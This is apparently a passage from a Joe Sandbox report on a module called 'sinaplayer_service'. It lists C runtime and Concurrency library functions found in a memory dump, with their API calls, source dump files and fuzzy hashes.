                                                                                                                                                                                                    • Opcode ID: 046a392aa320d4742232906cb6f40c90ea0a628746f29f145db0bd11c2471525
                                                                                                                                                                                                    • Instruction ID: c777f0fc9f3372014e7ca2262b96554b0494ad7ecced4ac4bebc443b10ded1d3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 046a392aa320d4742232906cb6f40c90ea0a628746f29f145db0bd11c2471525
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F211E630998316DAFB129FA4C4403BE32F0EF69714F058516DC24DB281E77CC541CBA2
                                                                                                                                                                                                    Function 6D0FD59B Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___copy_to_char.LIBCMT ref: 6D0FD5B1
                                                                                                                                                                                                      • Part of subcall function 6D0FBAD8: _errno.MSVCR120(00000000,00000000,?,?,6D0FD240,6D0FD344,?,?,?,?,?,6D0FD330,?,?), ref: 6D0FBAE5
                                                                                                                                                                                                      • Part of subcall function 6D0FBAD8: _invalid_parameter_noinfo.MSVCR120(00000000,00000000,?,?,6D0FD240,6D0FD344,?,?,?,?,?,6D0FD330,?,?), ref: 6D0FBAEF
                                                                                                                                                                                                    • strcpy_s.MSVCR120(?,00000104,?,00000000,?,?,?,?,6D0FD694,?,?), ref: 6D0FD5D2
                                                                                                                                                                                                    • free.MSVCR120(?,6D0FD694,?,?), ref: 6D0FD5E1
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FD694,?,?), ref: 6D0FD620
                                                                                                                                                                                                      • Part of subcall function 6D12469B: IsProcessorFeaturePresent.KERNEL32(00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000,00000000,00000000,00000000,6D0FB412), ref: 6D12469D
                                                                                                                                                                                                      • Part of subcall function 6D12469B: __crtTerminateProcess.MSVCR120(C0000417,00000002,C0000417,00000001,?,00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000), ref: 6D1246BC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FeaturePresentProcessProcessorTerminate___copy_to_char__crt_errno_invalid_parameter_noinfo_invoke_watsonfreestrcpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2471170729-0
                                                                                                                                                                                                    • Opcode ID: a87bed1b3754add4628d06fd8ecc3efec46b0da3e58957822754d66e712da6c5
                                                                                                                                                                                                    • Instruction ID: f945a1ba116d9d46c74e0b82c3eb5acda5ad922391209c63ad8d9916b14cd974
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a87bed1b3754add4628d06fd8ecc3efec46b0da3e58957822754d66e712da6c5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B11DAB5A0470AAFD710CF69D980946F7F8FF096147108A6AE959C3B00E371FA558FA0
                                                                                                                                                                                                    Function 6D0AFE3C Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?,?,?,?,?,6D0AFDFE,?,?,?), ref: 6D0AFE82
                                                                                                                                                                                                    • _lseek.MSVCR120(00000000,?,?,?,?,?,?,6D0AFDFE,?,?,?), ref: 6D0AFE89
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,6D0AFDFE,?,?,?,?,?,?,?,?,?,6D0AFE20,0000000C), ref: 6D0D5631
                                                                                                                                                                                                    • _ftell_nolock.MSVCR120(?,?,?,?,?,6D0AFDFE,?,?,?,?,?,?,?,?,?,6D0AFE20), ref: 6D0D5645
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_fileno_ftell_nolock_lseek
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1482834326-0
                                                                                                                                                                                                    • Opcode ID: e1b8fd3bb3692f9a2688dcc8388ed6d6cb7c2fe34ff5bc3a77c116305ee9a9b1
                                                                                                                                                                                                    • Instruction ID: 639f83ccf0a397cd6a01fe86be003aa1163f73254919b11d902c14d553a78149
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1b8fd3bb3692f9a2688dcc8388ed6d6cb7c2fe34ff5bc3a77c116305ee9a9b1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C1104361147055FFB119FA8C880BAE77ACEF57378B18821AF9749B1D2D736E80187A4
                                                                                                                                                                                                    Function 6D0FA80B Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR120 ref: 6D0FA830
                                                                                                                                                                                                      • Part of subcall function 6D0E8D76: _SpinWait.LIBCMT(?,?,6D0EF2B2,00000000), ref: 6D0E8D8E
                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::PrepareForUse.LIBCMT ref: 6D0FA84D
                                                                                                                                                                                                    • Concurrency::details::ScheduleGroupSegmentBase::GetInternalContext.LIBCMT ref: 6D0FA859
                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCMT ref: 6D0FA874
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base::Concurrency::details::ContextInternalSpin$Concurrency@@DeferredGroupOnce@?$_PrepareScheduleSchedulerSegmentWaitWait@$00@details@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328162323-0
                                                                                                                                                                                                    • Opcode ID: d0d83f327039b8419f5ce4b056e78f56b723db306bdc9727f373dc2f147b11d9
                                                                                                                                                                                                    • Instruction ID: 92a8456f9a02d4dda93a8658161b2a9eda93d59b12a99e71c502bc36ce7ddde3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0d83f327039b8419f5ce4b056e78f56b723db306bdc9727f373dc2f147b11d9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC11BF75608705AFE711DE64C880E3AB3E5EF84358B20492DEE6247250CB71E807CBA2
                                                                                                                                                                                                    Function 6D1422C0 Relevance: 6.1, APIs: 4, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _ldtest_log1psqrt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 198549442-0
                                                                                                                                                                                                    • Opcode ID: 53d851f239d67840519314a9c70163e5ffb4e245e05c70d42aec118e78fb717b
                                                                                                                                                                                                    • Instruction ID: b458e1ed1f48104ff6a223b98aa2a0afaca1183c76f5ccd314af8ab4a3ac989c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53d851f239d67840519314a9c70163e5ffb4e245e05c70d42aec118e78fb717b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B0149B2C0490DA1CF163F50E5542D57B78EB06BD1B228984D585F12A9BFB289904AC4
                                                                                                                                                                                                    Function 6D10ABA2 Relevance: 6.1, APIs: 4, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D10ABB0
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D10ABBB
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D10ABCC
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D10ABD7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    • Opcode ID: 30a932556a2887eb90f6c4205129141b8376bceff24a984aedeffff12ab9b976
                                                                                                                                                                                                    • Instruction ID: fef3a4d56e5565d54af0db9c2d1ee0c8d2da3fc2c0fc93d80193a2c0b7089654
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30a932556a2887eb90f6c4205129141b8376bceff24a984aedeffff12ab9b976
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1114C30A0C2465BDB12BF289900B79B765EF52318F174599D8704F1D9DFF29882C7A0
                                                                                                                                                                                                    Function 6D0FA492 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0FA621: GetCurrentThreadId.KERNEL32 ref: 6D0FA65B
                                                                                                                                                                                                      • Part of subcall function 6D0FA621: swprintf_s.MSVCR120(?,00000401,[%d:%d:%d:%d(%d)] ,00000000,?,?,?,?,?,6D0FA4C1,?), ref: 6D0FA685
                                                                                                                                                                                                      • Part of subcall function 6D0FA621: vswprintf.LIBCMT(00000401,00000401,?,6D0FA4C1,?,?,?,?,?,6D0FA4C1,?), ref: 6D0FA6AD
                                                                                                                                                                                                    • _fwprintf.LIBCMT(6D15E040,?), ref: 6D0FA4DB
                                                                                                                                                                                                      • Part of subcall function 6D102828: _errno.MSVCR120(6D1028C0,0000000C,6D0FA4E0,6D15E040,?), ref: 6D102847
                                                                                                                                                                                                      • Part of subcall function 6D102828: _invalid_parameter_noinfo.MSVCR120(6D1028C0,0000000C,6D0FA4E0,6D15E040,?), ref: 6D102852
                                                                                                                                                                                                    • __aullrem.LIBCMT ref: 6D0FA4F4
                                                                                                                                                                                                    • fflush.MSVCR120(00000032,00000000), ref: 6D0FA517
                                                                                                                                                                                                      • Part of subcall function 6D0A0A94: _lock_file.MSVCR120(?,6D0A0AE0,0000000C), ref: 6D0A0AB1
                                                                                                                                                                                                      • Part of subcall function 6D0A0A94: _fflush_nolock.MSVCR120(?,6D0A0AE0,0000000C), ref: 6D0A0ABB
                                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 6D0FA526
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentDebugOutputStringThread__aullrem_errno_fflush_nolock_fwprintf_invalid_parameter_noinfo_lock_filefflushswprintf_svswprintf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3114624150-0
                                                                                                                                                                                                    • Opcode ID: d9c273d21ef9b5b468d966b22e5a6f9d21c4382307c1fcf42301fa12ffb4f7b2
                                                                                                                                                                                                    • Instruction ID: 73e7bea96fae6cca4421e756e4e1fafe5b6016b9d2d063b5f491ed7d8d79dbc6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9c273d21ef9b5b468d966b22e5a6f9d21c4382307c1fcf42301fa12ffb4f7b2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A118A76904105DBDF50DF65E850FAA37F8EB49715F214059E90497141FFB0AA85CB90
                                                                                                                                                                                                    Function 6D0AC50F Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,6D163B90,00000001,?,6D0FC4E5,00000000,00000000), ref: 6D0AC521
                                                                                                                                                                                                    • malloc.MSVCR120(00000001,00000000,6D163B90,00000001,?,6D0FC4E5,00000000,00000000), ref: 6D0AC52A
                                                                                                                                                                                                      • Part of subcall function 6D08ED30: HeapAlloc.KERNEL32(005A0000,00000000,6D0FC0AD,00000000,?,00000000,?,6D09223C,6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000), ref: 6D08ED5D
                                                                                                                                                                                                    • strcpy_s.MSVCR120(00000000,00000001,00000000,6D163B90,00000001,?,6D0FC4E5,00000000,00000000), ref: 6D0AC53C
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D0D603D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocHeap_invoke_watsonmallocstrcpy_sstrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4191897266-0
                                                                                                                                                                                                    • Opcode ID: 7e3913ea4bbe5590477aef437292c44a840911bebf62fcb2155f105b1f15f24f
                                                                                                                                                                                                    • Instruction ID: 1038e43002c73814336e93e1f892fae9ecc66d5ac18a969d7d1f8df3a1700502
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e3913ea4bbe5590477aef437292c44a840911bebf62fcb2155f105b1f15f24f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FF0463221C20A2BF71099F8AC4077B37DCD786258B808479FE08CA100F6668991A194
                                                                                                                                                                                                    Function 6D0AD9D8 Relevance: 6.1, APIs: 4, Instructions: 53timethreadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6D0DF3F5
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6D0DF404
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 6D0DF40D
                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6D0DF41A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                    • Opcode ID: 04e5be1122a3187302041b01e6cbe4f1fffcf7474a9adca5b9c86cffd3ca4fa9
                                                                                                                                                                                                    • Instruction ID: 452261425ddada45bc995add9b053cfc9c83a770fc2cb214cae2a5c753029da1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04e5be1122a3187302041b01e6cbe4f1fffcf7474a9adca5b9c86cffd3ca4fa9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17113DB1D05249ABEF44DBB9E5547BE7BF8EF49311F6145AAD502E7240EB708A008B50
                                                                                                                                                                                                    Function 6D0F5C64 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,6D0ECA56,?,?,00000000), ref: 6D0F5CC3
                                                                                                                                                                                                    • List.LIBCMT ref: 6D0F5CCD
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,6D0ECA56,?,?,00000000), ref: 6D0F5CD3
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6D0ECA56,?,?,00000000), ref: 6D0F5CE0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeaveListfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 645074056-0
                                                                                                                                                                                                    • Opcode ID: 89a49ad003f0687a9a84939a16ac255b101331ca1e6f6ee04a9c83e62dd6e4c7
                                                                                                                                                                                                    • Instruction ID: 1f33ca255df95280ec10fad64ae37479876caf3efa1c28425dc3511fa8e21216
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89a49ad003f0687a9a84939a16ac255b101331ca1e6f6ee04a9c83e62dd6e4c7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A11C276601110DFCB08DF58D885A69F7B8FF99314725409AE8069B352C772ED02CBD4
                                                                                                                                                                                                    Function 6D09F81C Relevance: 6.1, APIs: 4, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _getptd.MSVCR120(6D09F8A8,0000000C,6D09F8E3,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D09F82D
                                                                                                                                                                                                    • _lock.MSVCR120(0000000D,6D09F8A8,0000000C,6D09F8E3,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D09F845
                                                                                                                                                                                                      • Part of subcall function 6D08EDD7: EnterCriticalSection.KERNEL32(?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D08EDF3
                                                                                                                                                                                                    • free.MSVCR120(?,6D09F8A8,0000000C,6D09F8E3,00000000,?,6D0AE01F,00000000), ref: 6D0D758A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalEnterSection_getptd_lockfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2954757286-0
                                                                                                                                                                                                    • Opcode ID: 4161715d615d2c355949f888b0edd93b1580a8a6f99dfd309199d23f09d583bc
                                                                                                                                                                                                    • Instruction ID: 28e0e02e6f9c3e4ea47afd97dea9a2ec021c9726b319149f7c3848aa0780168c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4161715d615d2c355949f888b0edd93b1580a8a6f99dfd309199d23f09d583bc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23118272D957229BFB81DF68940072E7BB4FB05720B51415AF870EB284CBB4A942DFC2
                                                                                                                                                                                                    Function 6D0F84C9 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0F84D0
                                                                                                                                                                                                    • ??0event@Concurrency@@QAE@XZ.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 6D0F8500
                                                                                                                                                                                                      • Part of subcall function 6D0EB72C: ??0critical_section@Concurrency@@QAE@XZ.MSVCR120(00000000,6D0F86D2,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215), ref: 6D0EB73C
                                                                                                                                                                                                    • ?set@event@Concurrency@@QAEXXZ.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 6D0F8549
                                                                                                                                                                                                    • Concurrency::details::ContextBase::CreateWorkQueue.LIBCMT ref: 6D0F8560
                                                                                                                                                                                                    Memory Dump Source
